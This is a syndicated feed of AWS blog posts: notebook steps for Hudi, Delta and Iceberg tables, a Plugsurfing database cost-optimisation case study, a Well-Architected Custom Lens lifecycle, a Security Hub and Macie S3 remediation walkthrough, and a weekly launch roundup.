  16. Run the cells in the section Incremental Query. You can verify that you’re seeing only the recent commit about product_id=00006.

On this notebook, you could complete the basic Spark DataFrame operations on Hudi tables.

Delta Lake

To read/write Delta Lake tables in the AWS Glue Studio notebook, complete following:

  1. Download delta_sql.ipynb.
  2. Open AWS Glue Studio.
  3. Choose Jobs.
  4. Choose Jupyter notebook, and then choose Upload and edit an existing notebook. From Choose file, select your ipynb file and choose Open, then choose Create.
  5. On the Notebook setup page, for Job name, enter your job name.
  6. For IAM role, select your IAM role. Choose Create job. After a short time period, the Jupyter notebook editor appears.
  7. In the first cell, replace the placeholder with your Delta connection name, and run the cell:
    %connections delta-100-byoc-connection
  8. In the second cell, replace the S3 bucket name placeholder with your S3 bucket name, and run the cell.
  9. Run the cells in the section Initialize SparkSession.
  10. Run the cells in the section Clean up existing resources.
  11. Run the cells in the section Create Delta table with sample data to create a new Delta table with sample data.
  12. Run the cells in the section Create a Delta Lake table.
  13. Run the cells in the section Read from Delta Lake table to verify the new Delta table. There are five records in this table.
  14. Run the cells in the section Insert records. The query inserts two new records: record_id=00006, and record_id=00007.
  15. Run the cells in the section Update records. The query updates the price of the existing records record_id=00007, and record_id=00007 from 500 to 300.
  16. Run the cells in the section Upsert records. to see how upsert works on Delta. This code inserts one new record, and updates the one existing record. You can verify that there is a new record product_id=00008, and the existing record product_id=00001’s price has been updated from 250 to 400.
  17. Run the cells in the section Alter DeltaLake table. The queries add one new column, and update the values in the column.
  18. Run the cells in the section Delete records. You can verify that the record product_id=00006 because it’s product_name is Pen.
  19. Run the cells in the section View History to describe the history of operations that was triggered against the target Delta table.

On this notebook, you could complete the basic Spark SQL operations on Delta tables.

Apache Iceberg

To read/write Apache Iceberg tables in the AWS Glue Studio notebook, complete the following:

  1. Download iceberg_sql.ipynb.
  2. Open AWS Glue Studio.
  3. Choose Jobs.
  4. Choose Jupyter notebook and then choose Upload and edit an existing notebook. From Choose file, select your ipynb file and choose Open, then choose Create.
  5. On the Notebook setup page, for Job name, enter your job name.
  6. For IAM role, select your IAM role. Choose Create job. After a short time period, the Jupyter notebook editor appears.
  7. In the first cell, replace the placeholder with your Delta connection name, and run the cell:
    %connections iceberg-0131-byoc-connection (Alternatively you can use your connection name created from the marketplace connector).
  8. In the second cell, replace the S3 bucket name placeholder with your S3 bucket name, and run the cell.
  9. Run the cells in the section Initialize SparkSession.
  10. Run the cells in the section Clean up existing resources.
  11. Run the cells in the section Create Iceberg table with sample data to create a new Iceberg table with sample data.
  12. Run the cells in the section Read from Iceberg table.
  13. Run the cells in the section Upsert records into Iceberg table.
  14. Run the cells in the section Delete records.
  15. Run the cells in the section View History and Snapshots.

On this notebook, you could complete the basic Spark SQL operations on Iceberg tables.

Conclusion

This post summarized how to utilize Apache Hudi, Delta Lake, and Apache Iceberg on AWS Glue platform, as well as demonstrate how each format works with a Glue Studio notebook. You can start using those data lake formats easily in Spark DataFrames and Spark SQL on the Glue jobs or the Glue Studio notebooks.

This post focused on interactive coding and querying on notebooks. The upcoming part 2 will focus on the experience using AWS Glue Studio Visual Editor and Glue DynamicFrames for customers who prefer visual authoring without the need to write code.


About the Authors

Noritaka Sekiyama is a Principal Big Data Architect on the AWS Glue team. He enjoys learning different use cases from customers and sharing knowledge about big data technologies with the wider community.

Dylan Qu is a Specialist Solutions Architect focused on Big Data & Analytics with AWS. He helps customers architect and build highly scalable, performant, and secure cloud-based solutions on AWS.

Monjumi Sarma is a Data Lab Solutions Architect at AWS. She helps customers architect data analytics solutions, which gives them an accelerated path towards modernization initiatives.

How Plugsurfing doubled performance and reduced cost by 70% with purpose-built databases and AWS Graviton

Post Syndicated from Anand Shah original https://aws.amazon.com/blogs/big-data/how-plugsurfing-doubled-performance-and-reduced-cost-by-70-with-purpose-built-databases-and-aws-graviton/

Plugsurfing aligns the entire car charging ecosystem—drivers, charging point operators, and carmakers—within a single platform. The over 1 million drivers connected to the Plugsurfing Power Platform benefit from a network of over 300,000 charging points across Europe. Plugsurfing serves charging point operators with a backend cloud software for managing everything from country-specific regulations to providing diverse payment options for customers. Carmakers benefit from white label solutions as well as deeper integrations with their in-house technology. The platform-based ecosystem has already processed more than 18 million charging sessions. Plugsurfing was acquired fully by Fortum Oyj in 2018.

Plugsurfing uses Amazon OpenSearch Service as a central data store to store 300,000 charging stations’ information and to power search and filter requests coming from mobile, web, and connected car dashboard clients. With the increasing usage, Plugsurfing created multiple read replicas of an OpenSearch Service cluster to meet demand and scale. Over time and with the increase in demand, this solution started to become cost exhaustive and limited in terms of cost performance benefit.

AWS EMEA Prototyping Labs collaborated with the Plugsurfing team for 4 weeks on a hands-on prototyping engagement to solve this problem, which resulted in 70% cost savings and doubled the performance benefit over the current solution. This post shows the overall approach and ideas we tested with Plugsurfing to achieve the results.

The challenge: Scaling higher transactions per second while keeping costs under control

One of the key issues of the legacy solution was keeping up with higher transactions per second (TPS) from APIs while keeping costs low. The majority of the cost was coming from the OpenSearch Service cluster, because the mobile, web, and EV car dashboards use different APIs for different use cases, but all query the same cluster. The solution to achieve higher TPS with the legacy solution was to scale the OpenSearch Service cluster.

The following figure illustrates the legacy architecture.

Legacy Architecture

Plugsurfing APIs are responsible for serving data for four different use cases:

  • Radius search – Find all the EV charging stations (latitude/longitude) with in x km radius from the point of interest (or current location on GPS).
  • Square search – Find all the EV charging stations within a box of length x width, where the point of interest (or current location on GPS) is at the center.
  • Geo clustering search – Find all the EV charging stations clustered (grouped) by their concentration within a given area. For example, searching all EV chargers in all of Germany results in something like 50 in Munich and 100 in Berlin.
  • Radius search with filtering – Filter the results by EV charger that are available or in use by plug type, power rating, or other filters.

The OpenSearch Service domain configuration was as follows:

  • m4.10xlarge.search x 4 nodes
  • Elasticsearch 7.10 version
  • A single index to store 300,000 EV charger locations with five shards and one replica
  • A nested document structure

The following code shows the example document

{
   "locationId":"location:1",
   "location":{
      "latitude":32.1123,
      "longitude":-9.2523
   },
   "adress":"parking lot 1",
   "chargers":[
      {
         "chargerId":"location:1:charger:1",
         "connectors":[
            {
               "connectorId":"location:1:charger:1:connector:1",
               "status":"AVAILABLE",
               "plug_type":"Type A"
            }
         ]
      }
   ]
}

Solution overview

AWS EMEA Prototyping Labs proposed an experimentation approach to try three high-level ideas for performance optimization and to lower overall solution costs.

We launched an Amazon Elastic Compute Cloud (EC2) instance in a prototyping AWS account to host a benchmarking tool based on k6 (an open-source tool that makes load testing simple for developers and QA engineers) Later, we used scripts to dump and restore production data to various databases, transforming it to fit with different data models. Then we ran k6 scripts to run and record performance metrics for each use case, database, and data model combination. We also used the AWS Pricing Calculator to estimate the cost of each experiment.

Experiment 1: Use AWS Graviton and optimize OpenSearch Service domain configuration

We benchmarked a replica of the legacy OpenSearch Service domain setup in a prototyping environment to baseline performance and costs. Next, we analyzed the current cluster setup and recommended testing the following changes:

  • Use AWS Graviton based memory optimized EC2 instances (r6g) x 2 nodes in the cluster
  • Reduce the number of shards from five to one, given the volume of data (all documents) is less than 1 GB
  • Increase the refresh interval configuration from the default 1 second to 5 seconds
  • Denormalize the full document; if not possible, then denormalize all the fields that are part of the search query
  • Upgrade to Amazon OpenSearch Service 1.0 from Elasticsearch 7.10

Plugsurfing created multiple new OpenSearch Service domains with the same data and benchmarked them against the legacy baseline to obtain the following results. The row in yellow represents the baseline from the legacy setup; the rows with green represent the best outcome out of all experiments performed for the given use cases.

DB Engine Version Node Type Nodes in Cluster Configurations Data Modeling Radius req/sec Filtering req/sec Performance Gain %
Elasticsearch 7.1 m4.10xlarge 4 5 shards, 1 replica Nested 2841 580 0
Amazon OpenSearch Service 1.0 r6g.xlarge 2 1 shards, 1 replica Nested 850 271 32.77
Amazon OpenSearch Service 1.0 r6g.xlarge 2 1 shards, 1 replica Denormalized 872 670 45.07
Amazon OpenSearch Service 1.0 r6g.2xlarge 2 1 shards, 1 replica Nested 1667 474 62.58
Amazon OpenSearch Service 1.0 r6g.2xlarge 2 1 shards, 1 replica Denormalized 1993 1268 95.32

Plugsurfing was able to gain 95% (doubled) better performance across the radius and filtering use cases with this experiment.

Experiment 2: Use purpose-built databases on AWS for different use cases

We tested Amazon OpenSearch Service, Amazon Aurora PostgreSQL-Compatible Edition, and Amazon DynamoDB extensively with many data models for different use cases.

We tested the square search use case with an Aurora PostgreSQL cluster with a db.r6g.2xlarge single node as the reader and a db.r6g.large single node as the writer. The square search used a single PostgreSQL table configured via the following steps:

  1. Create the geo search table with geography as the data type to store latitude/longitude:
CREATE TYPE status AS ENUM ('available', 'inuse', 'out-of-order');

CREATE TABLE IF NOT EXISTS square_search
(
id     serial PRIMARY KEY,
geog   geography(POINT),
status status,
data   text -- Can be used as json data type, or add extra fields as flat json
);
  1. Create an index on the geog field:
CREATE INDEX global_points_gix ON square_search USING GIST (geog);
  1. Query the data for the square search use case:
SELECT id, ST_AsText(geog), status, datafrom square_search
where geog && ST_MakeEnvelope(32.5,9,32.8,11,4326) limit 100;

We achieved an eight-times greater improvement in TPS for the square search use case, as shown in the following table.

DB Engine Version Node Type Nodes in Cluster Configurations Data modeling Square req/sec Performance Gain %
Elasticsearch 7.1 m4.10xlarge 4 5 shards, 1 replica Nested 412 0
Aurora PostgreSQL 13.4 r6g.large 2 PostGIS, Denormalized Single table 881 213.83
Aurora PostgreSQL 13.4 r6g.xlarge 2 PostGIS, Denormalized Single table 1770 429.61
Aurora PostgreSQL 13.4 r6g.2xlarge 2 PostGIS, Denormalized Single table 3553 862.38

We tested the geo clustering search use case with a DynamoDB model. The partition key (PK) is made up of three components: <zoom-level>:<geo-hash>:<api-key>, and the sort key is the EV charger current status. We examined the following:

  • The zoom level of the map set by the user
  • The geo hash computed based on the map tile in the user’s view port area (at every zoom level, the map of Earth is divided into multiple tiles, where each tile can be represented as a geohash)
  • The API key to identify the API user
Partition Key: String Sort Key: String total_pins: Number filter1_pins: Number filter2_pins: Number filter3_pins: Number
5:gbsuv:api_user_1 Available 100 50 67 12
5:gbsuv:api_user_1 in-use 25 12 6 1
6:gbsuvt:api_user_1 Available 35 22 8 0
6:gbsuvt:api_user_1 in-use 88 4 0 35

The writer updates the counters (increment or decrement) against each filter condition and charger status whenever the EV charger status is updated at all zoom levels. With this model, the reader can query pre-clustered data with a single direct partition hit for all the map tiles viewable by the user at the given zoom level.

The DynamoDB model helped us gain a 45-times greater read performance for our geo clustering use case. However, it also added extra work on the writer side to pre-compute numbers and update multiple rows when the status of a single EV charger is updated. The following table summarizes our results.

DB Engine Version Node Type Nodes in Cluster Configurations Data modeling Clustering req/sec Performance Gain %
Elasticsearch 7.1 m4.10xlarge 4 5 shards, 1 replica Nested 22 0
DynamoDB NA Serverless 0 100 WCU, 500 RCU Single table 1000 4545.45

Experiment 3: Use AWS Lambda@Edge and AWS Wavelength for better network performance

We recommended that Plugsurfing use Lambda@Edge and AWS Wavelength to optimize network performance by shifting some of the APIs at the edge to closer to the user. The EV car dashboard can use the same 5G network connectivity to invoke Plugsurfing APIs with AWS Wavelength.

Post-prototype architecture

The post-prototype architecture used purpose-built databases on AWS to achieve better performance across all four use cases. We looked at the results and split the workload based on which database performs best for each use case. This approach optimized performance and cost, but added complexity on readers and writers. The final experiment summary represents the database fits for the given use cases that provide the best performance (highlighted in orange).

Plugsurfing has already implemented a short-term plan (light green) as an immediate action post-prototype and plans to implement mid-term and long-term actions (dark green) in the future.

DB Engine Node Type Configurations Radius req/sec Radius Filtering req/sec Clustering req/sec Square req/sec Monthly Costs $ Cost Benefit % Performance Gain %
Elasticsearch 7.1 m4.10xlarge x4 5 shards 2841 580 22 412 9584,64 0 0
Amazon OpenSearch Service 1.0 r6g.2xlarge x2

1 shard

Nested

1667 474 34 142 1078,56 88,75 -39,9
Amazon OpenSearch Service 1.0 r6g.2xlarge x2 1 shard 1993 1268 125 685 1078,56 88,75 5,6
Aurora PostgreSQL 13.4 r6g.2xlarge x2 PostGIS 0 0 275 3553 1031,04 89,24 782,03
DynamoDB Serverless

100 WCU

500 RCU

0 0 1000 0 106,06 98,89 4445,45
Summary . . 2052 1268 1000 3553 2215,66 76,88 104,23

The following diagram illustrates the updated architecture.

Post Prototype Architecture

Conclusion

Plugsurfing was able to achieve a 70% cost reduction over their legacy setup with two-times better performance by using purpose-built databases like DynamoDB, Aurora PostgreSQL, and AWS Graviton based instances for Amazon OpenSearch Service. They achieved the following results:

  • The radius search and radius search with filtering use cases achieved better performance using Amazon OpenSearch Service on AWS Graviton with a denormalized document structure
  • The square search use case performed better using Aurora PostgreSQL, where we used the PostGIS extension for geo square queries
  • The geo clustering search use case performed better using DynamoDB

Learn more about AWS Graviton instances and purpose-built databases on AWS, and let us know how we can help optimize your workload on AWS.


About the Author

Anand ShahAnand Shah is a Big Data Prototyping Solution Architect at AWS. He works with AWS customers and their engineering teams to build prototypes using AWS Analytics services and purpose-built databases. Anand helps customers solve the most challenging problems using art-of-the-possible technology. He enjoys beaches in his leisure time.

Implementing the AWS Well-Architected Custom Lens lifecycle in your organization

Post Syndicated from Robert Hoffman original https://aws.amazon.com/blogs/architecture/implementing-the-aws-well-architected-custom-lens-lifecycle-in-your-organization/

In this blog post, we present a lifecycle that helps you build, validate, and improve your own AWS Well-Architected Custom Lens, in order to roll it out across your whole organization. The AWS Well-Architected Custom Lens is a new feature of the AWS Well-Architected Tool that lets you bring your own best practices to complement the existing Well-Architected Framework.

The Custom Lens lifecycle: how a Custom Lens can benefit your organization

The AWS Well-Architected Custom Lens Lifecycle

Figure 1. The AWS Well-Architected Custom Lens lifecycle

Each organization has its own requirements, processes, best practices, and tools, but the information can be spread over many systems and knowledge bases. A Custom Lens can capture the specifics of a working environment and let coworkers access this information in a single place—from the AWS console—without the need to go to a separate tool. A Custom Lens can be created in a central management account and securely shared with other accounts.

A Custom Lens can be updated periodically as either a major or minor version. If it is a minor version, the change is automatically applied to all accounts that the lens has been shared with. If it is a major version, the user has to accept the updated Custom Lens and a summary of the changes is displayed to the user. Accepting the changes then applies the update for existing workload reviews, and prompts the user to review the workload. Thus, updating a Custom Lens is an effective mechanism to continuously inform teams about new best practices.

In addition, maintaining and improving a Custom Lens continuously helps to identify gaps in organization-wide tooling, guidance, or documentation. You can aggregate feedback and metrics from reviews that have been performed and use it to drive the improvement process of the content. More importantly, the gathered metrics help measure the overall adherence to best practices and requirements in your organization. If you focus on creating clear, concise, and actionable content for your Custom Lens, the time needed to identify and implement improvements is reduced. As teams realize the value of the Custom Lens, more reviews will be performed, and you will receive more data to construct a comprehensive view.

1. Plan

The Plan phase identifies the benefits that a Custom Lens can provide your organization by identifying current gaps. You also define the scope of your Custom Lens, which is the type of content that supports your desired business outcomes. Depending on the scope, you need to identify the appropriate stakeholders and gain support for the initiative.

2. Implement

In the Implement phase, content is created for the Custom Lens with a working group. While doing this, you can identify missing supplementary artefacts, like documentation or tooling. If that is the case, you can create these artefacts and link to them from the Custom Lens Improvement Plan.

As part of the implementation, the Custom Lens is created by uploading a JSON file in the appropriate format to a central management account, then, sharing the lens with the organization’s AWS accounts. You can share the Custom Lens with IAM Principals, such as users, roles, and AWS accounts. For broader and more efficient sharing, you now have the ability to scale by sharing your Custom Lens with individual organizational units or the entire AWS Organizations. This feature reduces management overhead and removes the need for a custom automation.

3. Measure

The Measure phase aggregates feedback and metrics from reviews that have been performed with your Custom Lens; this information is used to drive the improvement process.

The Well-Architected Tool offers a way to share workload reviews, and you can use this to share all reviews with a central AWS account. You can then analyze the reviews in the central account by extracting the data and analyzing it, for example, by building a dashboard. The Well-Architected Lab for building custom reports provides a solution that can be implemented.

4. Improve

In the Improve phase, the gathered metrics and feedback are used to identify areas for future improvement. For example, you might find common gaps among the performed workload reviews, where the same best practices are not fulfilled. When you investigate the root cause, you can learn that the existing content lacks clarity or that the suggested tools are difficult to use.

In addition, improvements, such as content gaps that were not addressed during the first iteration of the Custom Lens, can be added to the backlog before you repeat the cycle.

To roll out changes of your Custom Lens in an automated and repeatable fashion, you can implement the architecture depicted in Figure 2.

Combining AWS CodeCommit with AWS Lambda to update your Custom Lens whenever a file change is pushed to the code repository

Figure 2. Combining AWS CodeCommit with AWS Lambda to update your Custom Lens whenever a file change is pushed to the code repository

This architecture enables automated releases of new versions of your Custom Lens whenever you commit an updated JSON file to the code repository. In detail, the steps are:

  1. The JSON file of your Custom Lens is stored in an AWS CodeCommit repository. An author pushes an updated version of the file to the repository.
  2. The CodeCommit repository is configured with a trigger action that invokes an AWS Lambda function on each commit.
  3. The Lambda function downloads the updated file by using the GetFile API of CodeCommit. Then, the Lambda function imports the updated Custom Lens and publishes it as a new version by using ImportLens and CreateLensVersion APIs of the AWS Well-Architected Tool, then shares the Custom Lens using CreateLensShare.
  4. The updated Custom Lens is available in all accounts that the lens has been shared with.
  5. Reviewers can create new workload reviews with the Custom Lens or upgrade to the newest version for existing workload reviews.

Conclusion

In this blog post, we walked you through the Custom Lens lifecycle, a process to create and continuously improve a Custom Lens for your organization. If you have a special software development lifecycle, a customized security and compliance framework, or other highly specific requirements or best practices that you want disseminated and measurable, learn more about how to create a Custom Lens in the Well-Architected Tool.

AWS Well-Architected is a set of guiding design principles developed by AWS to help organizations build secure, high-performing, resilient, and efficient infrastructure for a variety of applications and workloads. Use the AWS Well-Architected Tool to review your workloads periodically to address important design considerations and ensure that they follow the best practices and guidance of the AWS Well-Architected Framework. For follow up questions or comments, join our growing community on AWS re:Post.

Use Security Hub custom actions to remediate S3 resources based on Macie discovery results

Post Syndicated from Jonathan Nguyen original https://aws.amazon.com/blogs/security/use-security-hub-custom-actions-to-remediate-s3-resources-based-on-macie-discovery-results/

The amount of data available to be collected, stored and processed within an organization’s AWS environment can grow rapidly and exponentially. This increases the operational complexity and the need to identify and protect sensitive data. If your security teams need to review and remediate security risks manually, it would either take a large team or the actions might not be timely. There is also a chance that with manual operation, a step could be missed or the incorrect action could be taken. As a result, your security teams will need an automated and scalable way to support these operations efficiently.

Amazon Macie is a fully managed data security and data privacy service that uses machine learning and pattern matching to discover and protect your sensitive data in AWS. Macie generates findings for sensitive data in an S3 object or a potential issue with the security or privacy of an S3 bucket. AWS Security Hub allows you to gain a centralized view into the security posture across your AWS environment by aggregating security findings from various AWS services and partner products, including Amazon Macie. Security Hub also includes the custom actions feature, which you can use to create actions for response and remediation to selected findings within the Security Hub console in an efficient and consistent manner.

It is important for your security teams to create effective and standardized mechanisms for taking action against Macie findings to ensure that data remains secure. By using Security Hub custom actions, you can have predefined actions for the security team to take against Macie findings without having to manually find and remediate the resources.

This blog post provides you with an example solution for responding to Macie sensitive data findings and policy findings in Security Hub by using custom actions. I will walk through the components of the solution, as well as opportunities where resources can be customized for your specific use case.

Prerequisites

You must have AWS Security Hub and Amazon Macie enabled in the AWS account where you are deploying this solution.

Solution overview

In this solution, you’ll use a combination of Security Hub custom actions, Amazon EventBridge, and AWS Lambda to take action on Macie findings in Security Hub. You will be working with the findings within the same AWS account where you deployed the solution.

Macie generates two categories of findings relating to different resources, which will require different remediation actions.

  1. Policy finding is a detailed report of a potential policy violation or issue with the security or privacy of an Amazon Simple Storage Service (Amazon S3) bucket.
  2. Sensitive data finding is a detailed report of sensitive data in an S3 object.

A full list of Macie finding types can be found in the Macie User guide.

For the two Macie finding categories, there is an associated Security Hub custom action:

  1. Custom action for sensitive data finding (S3 object) – When the security team selects this custom action, the action invokes a Lambda function that will take the following steps on the S3 object in the Macie finding:
    1. Tag the object with the Security Hub finding ID
    2. Encrypt the S3 object with a different customer-managed KMS key
    3. Update the Security Hub finding workflow status to RESOLVED
  2. Custom action for policy finding (S3 bucket). When you select this this custom action, it invokes a Lambda function that will take the following steps on the S3 bucket in the Macie finding:
    1. Tag the object with the Security Hub finding ID
    2. Update the S3 bucket configuration to:
      • Enable default encryption
      • Enable public access block
    3. Update the Security Hub finding workflow status to RESOLVED

The solution is configured to take action within the AWS account where the finding and corresponding resource is generated. In order to enable cross-account remediation, you will need to deploy an additional IAM role for the automation to assume and provision a KMS key to use for encryption.

Note: The custom actions in this solution are meant to be examples of actions to take against Macie policy and sensitive data findings. These actions will be different depending on your use-case and environment. You will also need to review and update the associated Lambda function execution role IAM policies accordingly.

Solution architecture

Figure 1: Resources deployed in the Security AWS account taking action on resources identified in the Workload AWS account

Figure 1: Resources deployed in the Security AWS account taking action on resources identified in the Workload AWS account

Figure 1 shows the architecture for the solution. The workflow is as follows:

  1. A Macie job runs and creates findings, which are sent to Security Hub in the same AWS account as the Macie finding.
  2. The delegated administrator Security Hub account combines findings across all member Security Hub accounts, including Macie findings.
  3. The security team reviews the Macie findings in the Security Hub delegated administrator account and determines to take remediation actions for a finding by selecting the finding and then selecting the appropriate Security Hub custom action.
  4. The Security Hub custom action sends the finding to the EventBridge rule, which is linked to the Lambda function.
  5. The EventBridge rule invokes the Lambda function to take action against the resources from the Macie finding.
  6. The Lambda function will:
    1. Take action for the S3 resource
    2. Mark the Macie finding as resolved in the delegated administrator Security Hub account

The solution is currently intended to work in a single Region. In order to enable this solution across Regions, you will need to change the Remediation Lambda function code for any regional resources used for remediation actions (i.e. AWS Key Management Service).

Deploy the solution

You can deploy the solution through either the AWS Management Console or the AWS Cloud Development Kit (AWS CDK).

To deploy the solution by using the AWS Management Console

  • In your security tooling account, launch the AWS CloudFormation template by choosing the following Launch Stack button. It will take approximately 10 minutes for the CloudFormation stack to complete.
    Select this image to open a link that starts building the CloudFormation stack

    Note: The stack will launch in the N. Virginia (us-east-1) Region. To deploy this solution into other AWS Regions, download the solution’s CloudFormation template, modify it, and deploy it to the selected Region.

  • (OPTIONAL) If you want to enable cross-account remediation, launch the following AWS CloudFormation template in the AWS account where you want to be able to take remediation actions. You can also use AWS CloudFormation StackSets if deploying to multiple AWS accounts.
    Select this image to open a link that starts building the CloudFormation stack

To deploy the solution by using AWS CDK

You can find the latest code in our GitHub repository, where you can also contribute to the sample code. The following commands show how to deploy the solution by using the AWS CDK. First, the CDK initializes your environment and uploads the AWS Lambda assets to Amazon S3. Then, you can deploy the solution to your account. Make sure to replace <AWS_ACCOUNT> with the account number, and replace <REGION> with the AWS Region that you want the solution deployed to.

  1. Run the following commands in your terminal while authenticated in the security tooling AWS account:

    cdk bootstrap aws://<Security_Tooling_AWS_ACCOUNT>/<REGION>

    cdk deploy MacieRemediationStack

  2. (OPTIONAL) If you want to enable cross-account remediation, Run the following commands in your terminal while authenticated to member AWS account:

    cdk bootstrap aws://<Member_AWS_ACCOUNT>/<REGION>

    cdk deploy MacieRemediationIAMStack –parameters solutionaccount=<Security_Tooling_AWS_ACCOUNT>

Solution walkthrough and validation

Now that you’ve successfully deployed the solution, you can see things in action. You have two options for testing the workflow on your own:

  1. Use a sample event, generated by a Macie finding in Security Hub, and invoke the Lambda function that is tied to the Security Hub custom action.

    Note: If using sample events, you can replace the values for the resources with real resources. Otherwise, you will not be able to see the Lambda function successfully take action because the resource in your sample event may not exist.

  2. Generate demo Macie findings in Security Hub by using this sample data for Amazon Macie.

I have existing findings for Macie generated in my AWS account, and in the procedures in this section, I’ll walk through taking action against these.

Note: If you set up Macie and Security Hub in a delegated administrator and member model that ingests findings from other AWS accounts, the IAM remediation roles for the S3 bucket and S3 objects must be deployed in the member accounts.

Review deployed resources in the AWS console

Before taking action on your sample findings, review the deployed resources that you’ll use.

To review deployed resources

  1. In the AWS account console where the automation was deployed, go to Security Hub, choose Settings, and then choose Custom actions. You should see two custom actions:
    • Macie Policy Finding
      • arn:aws:securityhub:<region>:<account-id>:action/custom/MacieS3BucketPolicy
    • Macie Data Finding
      • arn:aws:securityhub:<region>:<account-id>:action/custom/MacieSensitiveData
        Figure 2: Custom actions in Security Hub

        Figure 2: Custom actions in Security Hub

  2. Navigate to the EventBridge console and then choose Rules. You should see four rules:
    • Disabled – These are disabled by default during deployment
      • Autoremediate_Macie_Policy_Finding
      • Autoremediate_Macie_Sensitive_Data_Finding
        Figure 3: Disabled EventBridge rules for autoremediation of Macie findings in Security Hub

        Figure 3: Disabled EventBridge rules for autoremediation of Macie findings in Security Hub

    • Enabled – These are enabled by default during deployment:
      • Custom_Action_Macie_Policy_Finding
      • Custom_Action_Macie_Sensitive_Data_Finding
        Figure 4: Enabled EventBridge rules tied to the Security Hub custom actions

        Figure 4: Enabled EventBridge rules tied to the Security Hub custom actions

    In the enabled EventBridge rules, you should see the corresponding Security Hub custom action Amazon Resource Names (ARNs) in the rule event pattern.

    Figure 5: Enabled EventBridge rule event pattern for the Security Hub custom action

    Figure 5: Enabled EventBridge rule event pattern for the Security Hub custom action

Take action on an Amazon Macie object or policy finding

Each Security Hub custom action invokes a corresponding Lambda function that is configured as a target in the EventBridge rule. The Lambda function parses the information in the Macie finding from Security Hub to take action.

Each Security Hub custom action is specific to either an S3 object or an S3 bucket. If you attempt a custom action meant for an S3 object against a Macie policy finding, this will successfully initiate the custom action, but the Lambda function that is invoked will be unsuccessful.

If the Macie finding is specific to an S3 object, the title will display “The S3 object …,” whereas if the Macie finding is for a policy finding, the title will display information for an S3 bucket.

To take action on findings

  1. In the AWS account console where the automation was deployed, navigate to AWS Security Hub, and then choose Findings.
  2. Filter the findings by setting Product Name to Macie.
    Figure 6: Filter for Macie findings in Security Hub

    Figure 6: Filter for Macie findings in Security Hub

  3. Select the checkbox for either a Macie policy finding or a sensitive data finding; this will select a custom action. After you select the action, there is no confirmation step, and the action will invoke the Lambda function.
    Figure 7: Validate Custom Action has sent the finding to Amazon CloudWatch Events (EventBridge rule)

    Figure 7: Validate Custom Action has sent the finding to Amazon CloudWatch Events (EventBridge rule)

Review and validate the Security Hub custom action on target resources

In order to validate or troubleshoot the solution, you need to review whether the Lambda function was able to take action against the resources in the Security Hub finding for Macie.

To validate or troubleshoot the custom action

  1. For validation of sensitive data finding remediation, review S3 object configuration:
    1. Navigate to the Amazon S3 console.
    2. Choose the S3 object in the Macie finding.
    3. Choose the Properties tab and review the following fields:
      • Tags should be set to SH_Finding_ID.
      • AWS KMS key ARN should be set to the KMS key with the alias `macie_key`
        1. Click on the KMS key ARN and validate the key’s alias is the key deployed in the solution
  2. For validation of policy finding remediation, review the S3 bucket configuration:
    1. Navigate to the Amazon S3 console.
    2. Choose the S3 bucket in the Macie finding.
    3. Choose the Properties tab and review the following fields:
      • Tags should be set to SH_Finding_ID.
      • Default Encryption should be set to Enabled.
    4. Choose the Permissions tab and review the following fields:
      • Block public access should be set to On.
  3. For troubleshooting, you can review the CloudWatch logs for the Lambda function:
    1. Navigate to the CloudWatch console.
    2. Choose /aws/lambda/Remediate_Macie_S3_Bucket.
    3. Choose the most recent log stream and review the logs to see what actions were taken on the resources.

Next steps and customization

The solution in this post has a custom action for an S3 object and an S3 bucket, and is meant to serve as a template. You could modify the Lambda functions associated with the custom actions to take different or additional actions that are specific to your environment and data classification.

Additionally, I walked through specific Security Hub custom actions for Macie policy (bucket) or sensitive data (objects) findings. If you have defined actions to take for both, you could consolidate the custom actions and invoke a Lambda function that parses information from the Security Hub Macie finding to determine if it is a policy or sensitive data finding.

The two disabled EventBridge rules deployed as part of the solution are examples that can be leveraged for auto-remediation. After you use Security Hub’s custom actions to remediate findings, your security team could start to see a trend where you always want to take specific actions and enable the EventBridge rules to take action without requiring your security team to select a custom action in Security Hub in the AWS console.

  • Autoremediate_Macie_Policy_Finding
  • Autoremediate_Macie_Sensitive_Data_Finding

Conclusion

In this post, you deployed a solution to allow your security team to take automated actions against a Macie sensitive data and policy finding from Security Hub by using custom actions in the AWS console. We walked through what the solution does and how the solution can be customized to your use case.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum or Amazon Macie forum.

Want more AWS Security news? Follow us on Twitter.

Jonathan Nguyen

Jonathan Nguyen

Jonathan is a Shared Delivery Team Senior Security Consultant at AWS. His background is in AWS Security with a focus on threat detection and incident response. Today, he helps enterprise customers develop a comprehensive security strategy and deploy security solutions at scale, and he trains customers on AWS Security best practices.

AWS Week In Review – July 18, 2022

Post Syndicated from Channy Yun original https://aws.amazon.com/blogs/aws/aws-week-in-review-july-18-2022/

Last week, AWS Summit New York was held in person at the Javits Center with thousands of attendees and over 100 sponsors and partners. During the keynote, Martin Beeby, AWS Principal Developer Advocate, talked about how innovations in cloud infrastructure enable customers to adapt to challenges and seize new opportunities. It included Liz Fong-Jones‘s great migration story of AWS Graviton in Honeycomb and Elliott Cordo‘s story of improving pharmacy experiences using AWS analytics and machine learning services in Capsule.

Watch the full keynote video!

A Recap of AWS Summit NY Announcements
During the keynote, we announced the general availability of some new services:

Amazon Redshift Serverless – This serverless option lets you analyze data at any scale without having to manage data warehouse infrastructure. You can now create multiple serverless endpoints per AWS account and Region using namespaces and workgroups and enjoy reducing serverless compute costs compared to the preview. To learn more, check out Danilio’s blog post, this demo video, and the latest episode of The Official AWS Podcast. We also introduced new features of row-level security (RLS), which implement fine-grained access to the rows in tables, and automated materialized view to lower query latency for repeatable workloads.

AWS Cloud WAN – This new network service makes it easy to build and operate wide area networks (WAN) that connect your data centers and branch offices, as well as multiple VPCs in multiple AWS Regions. To learn more, read Seb’s blog post.

Amazon DevOps Guru’s Log Anomaly Detection and Recommendations – This new feature identifies anomalies such as increased latency, error rates, and resource constraints within your app and then sends alerts with a description and actionable recommendations for remediation. To learn more, see Donnie’s blog post as a new News Blog writer.

Last Week’s Launches
Here are some other launches that caught my attention last week:

AWS AppConfig, a feature of AWS Systems Manager, makes it easy for customers to quickly and safely configure, validate, and deploy feature flags and application configuration. Now, we have announced AWS AppConfig Extensions, a new capability that allows customers to enhance and extend the capabilities of feature flags and dynamic runtime configuration data.

Available extensions at launch include AppConfig Notification extensions that push messages about configuration updates to Amazon EventBridge, Amazon SNS, Amazon SQS, or a Jira extension to track Feature Flag changes in AppConfig as Atlassian’s Jira issues. To get started, read Announcing AWS AppConfig Extensions and AppConfig Extensions.

